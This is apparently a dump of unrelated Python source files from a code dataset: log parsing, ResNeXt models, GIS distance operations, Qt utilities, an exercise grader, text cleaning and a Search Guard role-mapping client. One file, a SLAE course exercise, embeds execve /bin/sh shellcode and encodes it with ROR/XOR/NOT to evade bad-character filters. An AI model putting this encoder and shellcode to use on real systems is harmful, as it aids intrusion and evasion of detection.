appache_re = re.compile(APPACHE_COMBINED_LOG_REGEX)
wikipage_re = re.compile(WIKIPAGE_PATTERN)
def parse_apache_log(logline):
from dateutil import parser
m = appache_re.match(logline)
if m==None: return Row(ipaddr=None, timestamp = None, request = None, result = None,
user=None, referrer = None, agent = None, url = None, datetime = None,
date = None, time = None, wikipage = None)
timestamp = m.group(2)
request = m.group(3)
agent = m.group(7).replace('"','') if m.group(7) else ''
request_fields = request.split(" ")
url = request_fields[1] if len(request_fields)>2 else ""
datetime = parser.parse(timestamp.replace(":", " ", 1)).isoformat()
(date,time) = (datetime[0:10],datetime[11:])
n = wikipage_re.search(url)
wikipage = n.group(2) if n else ""
return Row( ipaddr = m.group(1), timestamp = timestamp, request = request,
result = int(m.group(4)), user = m.group(5), referrer = m.group(6),
agent = agent, url = url, datetime = datetime, date = date,
time = time, wikipage = wikipage)
def raw_logs(sc):
return sc.textFile("s3://gu-anly502/ps05/forensicswiki/2012/??/*")
def logs(sc):
"""Return a RDD with the parsed logs"""
return sc.textFile("s3://gu-anly502/ps05/forensicswiki/2012/??/*").\
map(lambda line:parse_apache_log(line))
#
# try this from the command line:
# ipyspark --py-files=fwiki.py
# import fwiki
# char_logs = fwiki.raw_logs(sc).filter(lambda line:"CHAR" in line)
# char_df = sqlCtx.createDataFrame(char_logs.map(fwiki.parse_apache_log))
# char_df.cache()
# char_df.registerTempTable("logs")
# sqlCtx.sql("select count(*) from logs").collect()
| StarcoderdataPython |
42397 | from app.infrastructure.repositories.camera.capture import CameraCapture
def main():
CameraCapture().run()
| StarcoderdataPython |
3367602 | import torch.nn as nn
import torch.utils.model_zoo as model_zoo
from .resnext101_32x4d_features import resnext101_32x4d_features,resnext101_32x4d_features_blob
__all__ = ['ResNeXt101_32x4d', 'resnext101_32x4d']
pretrained_settings = {
'resnext101_32x4d': {
'imagenet': {
'url': 'http://data.lip6.fr/cadene/pretrainedmodels/resnext101_32x4d-29e315fa.pth',
'input_space': 'RGB',
'input_size': [3, 224, 224],
'input_range': [0, 1],
'mean': [0.485, 0.456, 0.406],
'std': [0.229, 0.224, 0.225],
'num_classes': 1000
}
},
'resnext101_64x4d': {
'imagenet': {
'url': 'http://data.lip6.fr/cadene/pretrainedmodels/resnext101_64x4d-e77a0586.pth',
'input_space': 'RGB',
'input_size': [3, 224, 224],
'input_range': [0, 1],
'mean': [0.485, 0.456, 0.406],
'std': [0.229, 0.224, 0.225],
'num_classes': 1000
}
}
}
class ResNeXt101_32x4d_blob(nn.Module):
def __init__(self, num_classes=1000):
super(ResNeXt101_32x4d_blob, self).__init__()
self.num_classes = num_classes
resnext = resnext101_32x4d_features_blob()
self.features = resnext.resnext101_32x4d_features
self.avg_pool = nn.AvgPool2d((7, 7), (1, 1))
self.last_linear = nn.Linear(2048, num_classes)
def logits(self, input):
x = self.avg_pool(input)
x = x.view(x.size(0), -1)
x = self.last_linear(x)
return x
def forward(self, input):
x = self.features(input)
x = self.logits(x)
return x
class ResNeXt101_32x4d(nn.Module):
def __init__(self, num_classes=1000):
super(ResNeXt101_32x4d, self).__init__()
self.num_classes = num_classes
resnext = resnext101_32x4d_features()
self.stem = resnext.resnext101_32x4d_stem
self.layer1 = resnext.resnext101_32x4d_layer1
self.layer2 = resnext.resnext101_32x4d_layer2
self.layer3 = resnext.resnext101_32x4d_layer3
self.layer4 = resnext.resnext101_32x4d_layer4
self.avg_pool = nn.AvgPool2d((7, 7), (1, 1))
self.last_linear = nn.Linear(2048, num_classes)
def logits(self, input):
x = self.avg_pool(input)
x = x.view(x.size(0), -1)
x = self.last_linear(x)
return x
def forward(self, input):
x = self.stem(input)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.logits(x)
return x
def resnext101_32x4d(num_classes=1000, pretrained='imagenet'):
model = ResNeXt101_32x4d(num_classes=num_classes)
model_blob = ResNeXt101_32x4d_blob(num_classes=num_classes)
if pretrained is not None:
settings = pretrained_settings['resnext101_32x4d'][pretrained]
assert num_classes == settings['num_classes'], \
"num_classes should be {}, but is {}".format(settings['num_classes'], num_classes)
model_blob.load_state_dict(model_zoo.load_url(settings['url']))
model.stem = nn.Sequential(
model_blob.features[0],
model_blob.features[1],
model_blob.features[2],
model_blob.features[3],
)
model.layer1 = nn.Sequential(
model_blob.features[4],
)
model.layer2 = nn.Sequential(
model_blob.features[5],
)
model.layer3 = nn.Sequential(
model_blob.features[6],
)
model.layer4 = nn.Sequential(
model_blob.features[7],
)
# finish here
model.input_space = settings['input_space']
model.input_size = settings['input_size']
model.input_range = settings['input_range']
model.mean = settings['mean']
model.std = settings['std']
return model
# def resnext101_64x4d(num_classes=1000, pretrained='imagenet'):
# model = ResNeXt101_64x4d(num_classes=num_classes)
# if pretrained is not None:
# settings = pretrained_settings['resnext101_64x4d'][pretrained]
# assert num_classes == settings['num_classes'], \
# "num_classes should be {}, but is {}".format(settings['num_classes'], num_classes)
# model.load_state_dict(model_zoo.load_url(settings['url']))
# model.input_space = settings['input_space']
# model.input_size = settings['input_size']
# model.input_range = settings['input_range']
# model.mean = settings['mean']
# model.std = settings['std']
# return model | StarcoderdataPython |
93658 | <reponame>KevinWhalen/pcml
"""
Copyright (c) 2014 High-Performance Computing and GIS (HPCGIS) Laboratory. All rights reserved.
Use of this source code is governed by a BSD-style license that can be found in the LICENSE file.
Authors and contributors: <NAME> (<EMAIL>); <NAME> (<EMAIL>, <EMAIL>)
"""
from ..core.Operation import *
from ..core.Scheduler import *
from ..util.OperationBuilder import *
import numpy as np
import types
import math
@globaloperation
def GlobalMinMHDistance(self, locations, subdomains):
pointlist=subdomains[1].get_pointlist()
locind=locations[0]
loc=subdomains[0].get_yxloc(locind) # Convert from array coordinates (r,c) to (y,x) coordinates
mindst=999999999.0
mindstindex=-1
for index in xrange(len(pointlist)):
point=pointlist[index]
dst=abs(loc['y'] - point['y']) + abs(loc['x'] - point['x'])
if dst<mindst:
mindst=dst
mindstindex=index
return mindst
@globaloperation
def GlobalMinMHDistanceIndex(self, locations, subdomains):
pointlist=subdomains[1].get_pointlist()
locind=locations[0]
loc=subdomains[0].get_yxloc(locind) # Convert from array coordinates (r,c) to (y,x) coordinates
mindst=999999999.0
mindstindex=-1
for index in xrange(len(pointlist)):
point=pointlist[index]
dst=abs(loc['y'] - point['y']) + abs(loc['x'] - point['x'])
if dst<mindst:
mindst=dst
mindstindex=index
return mindstindex
@globaloperation
def GlobalMinDistanceIndex(self, locations, subdomains):
pointlist=subdomains[1].get_pointlist()
locind=locations[0]
loc=subdomains[0].get_yxloc(locind) # Convert from array coordinates (r,c) to (y,x) coordinates
#print "loc",loc
mindst=999999999.0
mindstindex=-1
for index in xrange(len(pointlist)):
point=pointlist[index]
#print "point",point
dst=math.sqrt((loc['y'] - point['y']) ** 2 + (loc['x'] - point['x']) ** 2)
if dst<mindst:
mindst=dst
mindstindex=index
#print "mindst",mindst
return mindstindex
@globaloperation
def GlobalMinDistance(self, locations, subdomains):
pointlist=subdomains[1].get_pointlist()
locind=locations[0]
loc=subdomains[0].get_yxloc(locind) # Convert from array coordinates (r,c) to (y,x) coordinates
mindst=999999999.0
for point in pointlist:
#print "point",point
dst=math.sqrt((loc['y'] - point['y']) ** 2 + (loc['x'] - point['x']) ** 2)
if dst<mindst:
mindst=dst
#print "mindst",mindst
return mindst
| StarcoderdataPython |
170839 | <reponame>rBrenick/copy-paste-overload<gh_stars>0
# Standard
import os
import sys
from functools import partial
# Not even going to pretend to have Maya 2016 support
from PySide2 import QtCore
from PySide2 import QtWidgets
from PySide2 import QtGui
from shiboken2 import wrapInstance
from PySide2 import QtUiTools
import sys
if sys.version_info.major > 2:
long = int
UI_FILES_FOLDER = os.path.dirname(__file__)
ICON_FOLDER = os.path.join(os.path.dirname(os.path.dirname(__file__)), "icons")
"""
QT UTILS BEGIN
"""
def get_app_window():
top_window = None
try:
from maya import OpenMayaUI as omui
maya_main_window_ptr = omui.MQtUtil().mainWindow()
top_window = wrapInstance(long(maya_main_window_ptr), QtWidgets.QMainWindow)
except ImportError as e:
pass
return top_window
def delete_window(object_to_delete):
qApp = QtWidgets.QApplication.instance()
if not qApp:
return
for widget in qApp.topLevelWidgets():
if "__class__" in dir(widget):
if str(widget.__class__) == str(object_to_delete.__class__):
widget.deleteLater()
widget.close()
def load_ui_file(ui_file_name):
ui_file_path = os.path.join(UI_FILES_FOLDER, ui_file_name) # get full path
if not os.path.exists(ui_file_path):
sys.stdout.write("UI FILE NOT FOUND: {}\n".format(ui_file_path))
return None
ui_file = QtCore.QFile(ui_file_path)
ui_file.open(QtCore.QFile.ReadOnly)
loader = QtUiTools.QUiLoader()
window = loader.load(ui_file)
ui_file.close()
return window
def create_qicon(icon_path):
icon_path = icon_path.replace("\\", "/")
if "/" not in icon_path:
icon_path = os.path.join(ICON_FOLDER, icon_path+".png") # find in icons folder if not full path
if not os.path.exists(icon_path):
return
return QtGui.QIcon(icon_path)
class BaseWindow(QtWidgets.QMainWindow):
def __init__(self, parent=get_app_window(), ui_file_name=None):
delete_window(self)
super(BaseWindow, self).__init__(parent)
self.ui = None
if ui_file_name:
self.load_ui(ui_file_name)
self.set_tool_icon("TOOL_NAME_icon")
self.show()
def set_tool_icon(self, icon_name):
icon = create_qicon(icon_name)
if icon:
self.setWindowIcon(icon)
def load_ui(self, ui_file_name):
self.ui = load_ui_file(ui_file_name)
self.setGeometry(self.ui.rect())
self.setWindowTitle(self.ui.property("windowTitle"))
self.setCentralWidget(self.ui)
parent_window = self.parent()
if not parent_window:
return
dcc_window_center = parent_window.mapToGlobal(parent_window.rect().center())
window_offset_x = dcc_window_center.x() - self.geometry().width()/2
window_offset_y = dcc_window_center.y() - self.geometry().height()/2
self.move(window_offset_x, window_offset_y) # move to dcc screen center
def ensure_main_layout(self):
if self.ui:
return
self.ui = QtWidgets.QWidget()
main_layout = QtWidgets.QVBoxLayout()
self.ui.setLayout(main_layout)
self.setCentralWidget(self.ui)
def add_button(self, text, command, clicked_args=None, layout=None):
self.ensure_main_layout()
btn = QtWidgets.QPushButton(text)
btn.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
if clicked_args:
btn.clicked.connect(partial(command, clicked_args))
else:
btn.clicked.connect(command)
if not layout:
layout = self.ui.layout()
layout.addWidget(btn)
"""
QT UTILS END
"""
| StarcoderdataPython |
107426 | def test():
# Here we can either check objects created in the solution code, or the
# string value of the solution, available as __solution__. A helper for
# printing formatted messages is available as __msg__. See the testTemplate
# in the meta.json for details.
# If an assertion fails, the message will be displayed
assert not cat_cols is None, "Your answer for cat_cols does not exist. Have you assigned the list of labels for categorical columns to the correct variable name?"
assert type(cat_cols) == list, "cat_cols does not appear to be of type list. Can you store all the labels of the categorical columns into a list called cat_cols?"
assert set(cat_cols) == set(['species', 'island', 'sex']), "Make sure you only include the categorical columns in cat_cols. Hint: there are 3 categorical columns in the dataframe."
assert cat_cols == ['species', 'island', 'sex'], "You're close. Please make sure that the categorical columns are ordered in the same order they appear in the dataframe."
assert not categorical_plots is None, "Your answer for categorical_plots does not exist. Have you assigned the chart object to the correct variable name?"
assert type(categorical_plots) == alt.vegalite.v4.api.RepeatChart, "Your answer is not an Altair RepeatChart object. Check to make sure that you have assigned an alt.Chart object to categorical_plots and that you are repeating by columns in cat_cols."
assert categorical_plots.spec.mark == 'circle', "Make sure you are using the 'mark_circle' to generate the plots."
assert (
([categorical_plots.spec.encoding.x.shorthand,
categorical_plots.spec.encoding.y.shorthand] ==
[alt.RepeatRef(repeat = 'row'),
alt.RepeatRef(repeat = 'column')]) or
([categorical_plots.spec.encoding.x.shorthand,
categorical_plots.spec.encoding.y.shorthand] ==
[alt.RepeatRef(repeat = 'column'),
alt.RepeatRef(repeat = 'row')])
), "Make sure you specify that the chart set-up is repeated for different rows & columns as the x-axis and y-axis encodings. Hint: use alt.repeat() with row and column arguments."
assert categorical_plots.spec.encoding.x.type == "nominal", "Make sure you let Altair know that alt.repeat() on the x-axis encoding is a nominal type. Altair can't infer the type since alt.repeat() is not a column in the dataframe."
assert categorical_plots.spec.encoding.y.type == "nominal", "Make sure you let Altair know that alt.repeat() on the y-axis encoding is a nominal type. Altair can't infer the type since alt.repeat() is not a column in the dataframe."
assert categorical_plots.spec.encoding.color != alt.utils.schemapi.Undefined and (
categorical_plots.spec.encoding.color.field in {'count()', 'count():quantitative', 'count():Q'} or
categorical_plots.spec.encoding.color.shorthand in {'count()', 'count():quantitative', 'count():Q'}
), "Make sure you are using 'count()' as the color encoding."
assert categorical_plots.spec.encoding.color.title is None, "Make sure you specify that no title should be assigned for color encoding. Hint: use None"
assert categorical_plots.spec.encoding.size != alt.utils.schemapi.Undefined and (
categorical_plots.spec.encoding.size.field in {'count()', 'count():quantitative', 'count():Q'} or
categorical_plots.spec.encoding.size.shorthand in {'count()', 'count():quantitative', 'count():Q'}
), "Make sure you are using 'count()' as the size encoding."
assert categorical_plots.spec.encoding.size.title is None, "Make sure you specify that no title should be assigned for size encoding. Hint: use None"
assert categorical_plots.resolve != alt.utils.schemapi.Undefined and categorical_plots.resolve.scale != alt.utils.schemapi.Undefined and (
categorical_plots.resolve.scale.color == "independent" and
categorical_plots.resolve.scale.size == "independent"
), "Make sure to give the size and colour channels independent scales. Hint: use resolve_scale"
__msg__.good("You're correct, well done!")
| StarcoderdataPython |
1617786 | <filename>src/utils/helpers.py
"""Helper functions for code sanity"""
import numpy as np
from tensorflow.keras.callbacks import Callback
from sklearn.metrics import accuracy_score, roc_auc_score
import re
from tqdm.notebook import tqdm
from sklearn import metrics
def regular_encode(texts, tokenizer, maxlen=512):
"""
This function is from the kernel:
https://www.kaggle.com/xhlulu/jigsaw-tpu-xlm-roberta
"""
enc_di = tokenizer.batch_encode_plus(
texts,
return_attention_masks=False,
return_token_type_ids=False,
pad_to_max_length=True,
max_length=maxlen
)
return np.array(enc_di['input_ids'])
def fast_encode(texts, tokenizer, chunk_size=256, maxlen=512):
"""
https://www.kaggle.com/xhlulu/jigsaw-tpu-distilbert-with-huggingface-and-keras
"""
tokenizer.enable_truncation(max_length=maxlen)
tokenizer.enable_padding(max_length=maxlen)
all_ids = []
for i in tqdm(range(0, len(texts), chunk_size)):
text_chunk = texts[i:i+chunk_size].tolist()
encs = tokenizer.encode_batch(text_chunk)
all_ids.extend([enc.ids for enc in encs])
return np.array(all_ids)
# def build_model(transformer, max_len=512):
# """
# https://www.kaggle.com/xhlulu/jigsaw-tpu-distilbert-with-huggingface-and-keras
# """
# input_word_ids = Input(shape=(max_len,), dtype=tf.int32, name="input_word_ids")
# sequence_output = transformer(input_word_ids)[0]
# cls_token = sequence_output[:, 0, :]
# out = Dense(1, activation='sigmoid')(cls_token)
# model = Model(inputs=input_word_ids, outputs=out)
# model.compile(Adam(lr=1e-5), loss='binary_crossentropy', metrics=['accuracy'])
# return model
def roc_auc(predictions,target):
"""
ROC-AUC value for binary classification.
From:
https://www.kaggle.com/tanulsingh077/
"""
fpr, tpr, thresholds = metrics.roc_curve(target, predictions)
roc_auc = metrics.auc(fpr, tpr)
return roc_auc
class RocAucEvaluation(Callback):
'''
https://www.kaggle.com/tarunpaparaju/jigsaw-multilingual-toxicity-eda-models/output#Modeling-
'''
def __init__(self, validation_data=(), interval=1):
super(Callback, self).__init__()
self.interval = interval
self.X_val, self.y_val = validation_data
def on_epoch_end(self, epoch, logs={}):
if epoch % self.interval == 0:
y_pred = self.model.predict(self.X_val, verbose=0)
score = roc_auc_score(self.y_val, y_pred)
print("\n ROC-AUC - epoch: {:d} - score: {:.6f}".format(epoch+1, score))
def build_lrfn(lr_start=0.000001, lr_max=0.000016,
lr_min=0.0000001, lr_rampup_epochs=7,
lr_sustain_epochs=0, lr_exp_decay=.87):
def lrfn(epoch):
if epoch < lr_rampup_epochs:
lr = (lr_max - lr_start) / lr_rampup_epochs * epoch + lr_start
elif epoch < lr_rampup_epochs + lr_sustain_epochs:
lr = lr_max
else:
lr = (lr_max - lr_min) * lr_exp_decay**(epoch - lr_rampup_epochs - lr_sustain_epochs) + lr_min
return lr
return lrfn
##### Text cleaning
from nltk import sent_tokenize
LANGS = {
'en': 'english',
'it': 'italian',
'fr': 'french',
'es': 'spanish',
'tr': 'turkish',
'ru': 'russian',
'pt': 'portuguese'
}
def get_sentences(text, lang='en'):
return sent_tokenize(text, LANGS.get(lang, 'english'))
def exclude_duplicate_sentences(text, lang='en'):
sentences = []
for sentence in get_sentences(text, lang):
sentence = sentence.strip()
if sentence not in sentences:
sentences.append(sentence)
return ' '.join(sentences)
def clean(text):
text = text.lower()
# text = exclude_duplicate_sentences(text, lang='en')
text = re.sub('\\n',' ', text)
text = re.sub("\[\[User.*",'',text)
text = re.sub("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}",'',text)
text = re.sub("\(http://.*?\s\(http://.*\)",'',text)
return text
# https://www.kaggle.com/chenshengabc/from-quest-encoding-ensemble-a-little-bit-differen
puncts = [')', '(', '-', '|', '$', '&', '/', '[', ']', '>', '%', '=', '#', '*', '+', '\\', '•', '~', '@', '£',
'·', '_', '{', '}', '©', '^', '®', '`', '<', '→', '°', '€', '™', '›', '♥', '←', '×', '§', '″', '′', 'Â', '█', '½', 'à', '…', '\xa0', '\t',
'“', '★', '”', '–', '●', 'â', '►', '−', '¢', '²', '¬', '░', '¶', '↑', '±', '¿', '▾', '═', '¦', '║', '―', '¥', '▓', '—', '‹', '─', '\u3000', '\u202f',
'▒', ':', '¼', '⊕', '▼', '▪', '†', '■', '’', '▀', '¨', '▄', '♫', '☆', 'é', '¯', '♦', '¤', '▲', 'è', '¸', '¾', 'Ã', '⋅', '‘', '∞', '«',
'∙', ')', '↓', '、', '│', '(', '»', ',', '♪', '╩', '╚', '³', '・', '╦', '╣', '╔', '╗', '▬', '❤', 'ï', 'Ø', '¹', '≤', '‡', '√', ]
special_puncts = [',', '.', '"', ':', '!', '?', ';', "'",]
mispell_dict = {"aren't" : "are not",
"can't" : "cannot",
"couldn't" : "could not",
"couldnt" : "could not",
"didn't" : "did not",
"doesn't" : "does not",
"doesnt" : "does not",
"don't" : "do not",
"hadn't" : "had not",
"hasn't" : "has not",
"haven't" : "have not",
"havent" : "have not",
"he'd" : "he would",
"he'll" : "he will",
"he's" : "he is",
"i'd" : "I would",
"i'd" : "I had",
"i'll" : "I will",
"i'm" : "I am",
"isn't" : "is not",
"it's" : "it is",
"it'll":"it will",
"i've" : "I have",
"let's" : "let us",
"mightn't" : "might not",
"mustn't" : "must not",
"shan't" : "shall not",
"she'd" : "she would",
"she'll" : "she will",
"she's" : "she is",
"shouldn't" : "should not",
"shouldnt" : "should not",
"that's" : "that is",
"thats" : "that is",
"there's" : "there is",
"theres" : "there is",
"they'd" : "they would",
"they'll" : "they will",
"they're" : "they are",
"theyre": "they are",
"they've" : "they have",
"we'd" : "we would",
"we're" : "we are",
"weren't" : "were not",
"we've" : "we have",
"what'll" : "what will",
"what're" : "what are",
"what's" : "what is",
"what've" : "what have",
"where's" : "where is",
"who'd" : "who would",
"who'll" : "who will",
"who're" : "who are",
"who's" : "who is",
"who've" : "who have",
"won't" : "will not",
"wouldn't" : "would not",
"you'd" : "you would",
"you'll" : "you will",
"you're" : "you are",
"you've" : "you have",
"'re": " are",
"wasn't": "was not",
"we'll":" will",
"didn't": "did not",
"tryin'":"trying"}
def clean_text(x):
x = str(x).replace("\n"," ")
for punct in puncts:
x = x.replace(punct, ' ')
return x
### clean text from the kernel:
### https://www.kaggle.com/mobassir/understanding-cross-lingual-models#Part-2-:-Implementation-using-TPU-Multiprocessing
from nltk.tokenize.treebank import TreebankWordTokenizer
def _get_mispell(mispell_dict):
mispell_re = re.compile('(%s)' % '|'.join(mispell_dict.keys()))
return mispell_dict, mispell_re
def replace_typical_misspell(text):
mispellings, mispellings_re = _get_mispell(mispell_dict)
def replace(match):
return mispellings[match.group(0)]
return mispellings_re.sub(replace, text)
def clean_data(df, columns: list):
for col in columns:
df[col] = df[col].apply(lambda x: clean(x))
df[col] = df[col].apply(lambda x: clean_text(x))
df[col] = df[col].apply(lambda x: replace_typical_misspell(x))
return df
def plot_loss(his, epoch, title):
plt.style.use('ggplot')
plt.figure()
plt.plot(np.arange(0, epoch), his.history['loss'], label='train_loss')
plt.plot(np.arange(0, epoch), his.history['val_loss'], label='val_loss')
plt.title(title)
plt.xlabel('Epoch #')
plt.ylabel('Loss')
plt.legend(loc='upper right')
plt.show()
def plot_auc(his, epoch, title):
plt.style.use('ggplot')
plt.figure()
plt.plot(np.arange(0, epoch), his.history['auc'], label='train_auc')
plt.plot(np.arange(0, epoch), his.history['val_auc'], label='val_auc')
plt.title(title)
plt.xlabel('Epoch #')
plt.ylabel('Loss')
plt.legend(loc='upper right')
plt.show()
### From https://www.kaggle.com/cengc13/jigsaw-tpu-bert-two-stage-training/edit
class TextTransformation:
def __call__(self, text: str, lang: str = None) -> tuple:
raise NotImplementedError('Abstarct')
class LowerCaseTransformation(TextTransformation):
def __call__(self, text: str, lang: str = None) -> tuple:
return text.lower(), lang
class URLTransformation(TextTransformation):
def __call__(self, text: str, lang: str = None) -> tuple:
for url in self.find_urls(text):
if url in text:
text.replace(url, ' external link ')
return text.lower(), lang
@staticmethod
def find_urls(string):
# https://www.geeksforgeeks.org/python-check-url-string/
urls = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', string)
return urls
class PunctuationTransformation(TextTransformation):
def __call__(self, text: str, lang: str = None) -> tuple:
for p in '?!.,"#$%\'()*+-/:;<=>@[\\]^_`{|}~' + '“”’' +"/-'" + "&" + "¡¿":
if '’' in text:
text = text.replace('’', f' \' ')
if '’' in text:
text = text.replace('’', f' \' ')
if '—' in text:
text = text.replace('—', f' - ')
if '−' in text:
text = text.replace('−', f' - ')
if '–' in text:
text = text.replace('–', f' - ')
if '“' in text:
text = text.replace('“', f' " ')
if '«' in text:
text = text.replace('«', f' " ')
if '»' in text:
text = text.replace('»', f' " ')
if '”' in text:
text = text.replace('”', f' " ')
if '`' in text:
text = text.replace('`', f' \' ')
text = text.replace(p, f' {p} ')
return text.strip(), lang
class NumericTransformation(TextTransformation):
def __call__(self, text: str, lang: str = None) -> tuple:
for i in range(10):
text = text.replace(str(i), f' {str(i)} ')
return text, lang
class WikiTransformation(TextTransformation):
def __call__(self, text: str, lang: str = None) -> tuple:
text = text.replace('wikiproject', ' wiki project ')
for i in [' vikipedi ', ' wiki ', ' википедии ', " вики ", ' википедия ', ' viki ', ' wikipedien ', ' википедию ']:
text = text.replace(i, ' wikipedia ')
return text, lang
class MessageTransformation(TextTransformation):
def __call__(self, text: str, lang: str = None) -> tuple:
text = text.replace('wikiproject', ' wiki project ')
for i in [' msg ', ' msj ', ' mesaj ']:
text = text.replace(i, ' message ')
return text, lang
class PixelTransformation(TextTransformation):
def __call__(self, text: str, lang: str = None) -> tuple:
for i in [' px ']:
text = text.replace(i, ' pixel ')
return text, lang
class SaleBotTransformation(TextTransformation):
def __call__(self, text: str, lang: str = None) -> tuple:
text = text.replace('salebot', ' sale bot ')
return text, lang
class RuTransformation(TextTransformation):
def __call__(self, text: str, lang: str = None) -> tuple:
if lang is not None and lang == 'ru' and 'http' not in text and 'jpg' not in text and 'wikipedia' not in text:
text = text.replace('t', 'т')
text = text.replace('h', 'н')
text = text.replace('b', 'в')
text = text.replace('c', 'c')
text = text.replace('k', 'к')
text = text.replace('e', 'е')
text = text.replace('a', 'а')
return text, lang
class CombineTransformation(TextTransformation):
def __init__(self, transformations: list, return_lang: bool = False):
self._transformations = transformations
self._return_lang = return_lang
def __call__(self, text: str, lang: str = None) -> tuple:
for transformation in self._transformations:
text, lang = transformation(text, lang)
if self._return_lang:
return text, lang
return text
def append(self, transformation: TextTransformation):
self._transformations.append(transformation)
transformer = CombineTransformation(
[
LowerCaseTransformation(),
PunctuationTransformation(),
NumericTransformation(),
PixelTransformation(),
MessageTransformation(),
WikiTransformation(),
SaleBotTransformation()
]
)
| StarcoderdataPython |
10354 | <filename>assignment4/rorxornotencode.py<gh_stars>10-100
#!/usr/bin/python
# Title: ROR/XOR/NOT encoder
# File: rorxornotencode.py
# Author: <NAME>
# SLAE-681
import sys
ror = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
shellcode = (
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
)
encoded = ""
encoded2 = ""
print "[*] Encoding shellcode..."
for x in bytearray(shellcode):
# ROR & XOR encoding
z = ror(x, 7, 8)^0xAA
# NOT encoding
y = ~z
if str('%02x' % (y & 0xff)).upper() == "00":
print ">>>>>>>>>> NULL detected in shellcode, aborting."
sys.exit()
if str('%02x' % (y & 0xff)).upper() == "0A":
print ">>>>>>>>>> \\xOA detected in shellcode."
if str('%02x' % (y & 0xff)).upper() == "0D":
print ">>>>>>>>>>> \\x0D detected in shellcode."
encoded += '\\x'
encoded += '%02x' % (y & 0xff)
encoded2 += '0x'
encoded2 += '%02x,' %(y & 0xff)
print "hex version : %s" % encoded
print "nasm version : %s" % encoded2
print "encoded shellcode : %s bytes" % str(len(encoded)/4)
| StarcoderdataPython |
43154 | #!/usr/bin/python3
import requests
import json
import searchguard.settings as settings
from searchguard.exceptions import RoleMappingException, CheckRoleMappingExistsException, ViewRoleMappingException, \
DeleteRoleMappingException, CreateRoleMappingException, ModifyRoleMappingException, CheckRoleExistsException, \
ViewAllRoleMappingException
from searchguard.roles import check_role_exists
PROPERTIES_KEYS = {"users", "backendroles", "hosts"}
def _send_api_request(role, properties):
"""Private function to process API calls for the rolemapping module"""
create_sg_rolemapping = requests.put('{}/rolesmapping/{}'.format(settings.SEARCHGUARD_API_URL, role),
data=json.dumps(properties),
headers=settings.HEADER,
auth=settings.SEARCHGUARD_API_AUTH)
if create_sg_rolemapping.status_code in (200, 201):
# Role mapping created or updated successfully
return
# Error when creating/updating the role mapping
raise RoleMappingException('Error creating/updating the mapping for role {} - msg {}'.format(
role, create_sg_rolemapping.text))
def check_rolemapping_exists(role):
"""Returns True of False depending on whether the requested role mapping exists in Search Guard"""
rolemapping_exists_check = requests.get('{}/rolesmapping/{}'.format(settings.SEARCHGUARD_API_URL, role),
auth=settings.SEARCHGUARD_API_AUTH)
if rolemapping_exists_check.status_code == 200:
# Role mapping exists in SearchGuard
return True
elif rolemapping_exists_check.status_code == 404:
# Role mapping does not exist in SearchGuard
return False
else:
# Could not fetch valid output
raise CheckRoleMappingExistsException('Unknown error checking whether role mapping for {} exists'.format(role))
def view_all_rolemappings():
"""Returns the properties for the requested role mappings if it exists"""
view_all_sg_rolemapping = requests.get('{}/rolesmapping/'.format(settings.SEARCHGUARD_API_URL),
auth=settings.SEARCHGUARD_API_AUTH)
if view_all_sg_rolemapping.status_code == 200:
return json.loads(view_all_sg_rolemapping.text)
else:
# Could not fetch valid output
raise ViewAllRoleMappingException('Unknown error retrieving all role mappings')
def view_rolemapping(role):
"""Returns the properties for the requested role mapping if it exists"""
view_sg_rolemapping = requests.get('{}/rolesmapping/{}'.format(settings.SEARCHGUARD_API_URL, role),
auth=settings.SEARCHGUARD_API_AUTH)
if view_sg_rolemapping.status_code == 200:
return json.loads(view_sg_rolemapping.text)
elif view_sg_rolemapping.status_code == 404:
# Raise exception because the role mapping does not exist
raise ViewRoleMappingException('Error viewing the role mapping for {}, does not exist'.format(role))
else:
# Could not fetch valid output
raise ViewRoleMappingException('Unknown error checking whether role mapping for {} exists'.format(role))
def delete_rolemapping(role):
"""Deletes a Search Guard role mapping. Returns when successfully deleted"""
if check_rolemapping_exists(role):
# The role mapping does exist, let's delete it
delete_sg_rolemapping = requests.delete('{}/rolesmapping/{}'.format(settings.SEARCHGUARD_API_URL, role),
auth=settings.SEARCHGUARD_API_AUTH)
if delete_sg_rolemapping.status_code == 200:
# Role mapping deleted successfully
return
else:
# Raise exception because we could not delete the role mapping
raise DeleteRoleMappingException('Error deleting the role mapping for role {} '
'- msg: {}'.format(role, delete_sg_rolemapping.text))
else:
# Raise exception because the role mapping does not exist
raise DeleteRoleMappingException('Error deleting the role mapping for role {}, does not exist'.format(role))
def create_rolemapping(role, properties):
"""Creates a Search Guard role mapping. Returns when successfully created
It is required to specify at least one of: users, backendroles or hosts in the properties argument.
We do not use the PATCH endpoint for backwards compatibility with Elasticsearch before 6.4.0
:param str role: Name of the role mapping to create in Search Guard
:param dict properties: Search Guard role mapping fields (users, backendroles and/or hosts)
:raises: CreateRoleMappingException, CheckRoleExistsException
"""
if not check_role_exists(role):
raise CheckRoleExistsException('Role {} does not exist'.format(role))
if not any(key in properties for key in PROPERTIES_KEYS):
# Raise exception because we did not receive valid properties
raise CreateRoleMappingException('Error creating mapping for role {} - Include at least one of: users, '
'backendroles or hosts keys in the properties argument'.format(role))
_send_api_request(role, properties)
return
def modify_rolemapping(role, properties, action="replace"):
"""Modifies a Search Guard role mapping. Returns when successfully modified
It is required to specify at least one of: users, backendroles or hosts in the properties argument.
We do not use the PATCH endpoint for backwards compatibility with Elasticsearch before 6.4.0
:param str role: Name of the role mapping to create in Search Guard
:param dict properties: Search Guard role mapping fields (users, backendroles and/or hosts)
:param str action: Defines what to do with the properties. Defaults to replace (overwrites existing
properties). Other options are merge (combine the properties with existing ones) or split
(removes the properties from existing ones)
:raises: ModifyRoleMappingException
"""
if not check_rolemapping_exists(role):
raise ModifyRoleMappingException('Mapping for role {} does not exist'.format(role))
if not any(key in properties for key in PROPERTIES_KEYS):
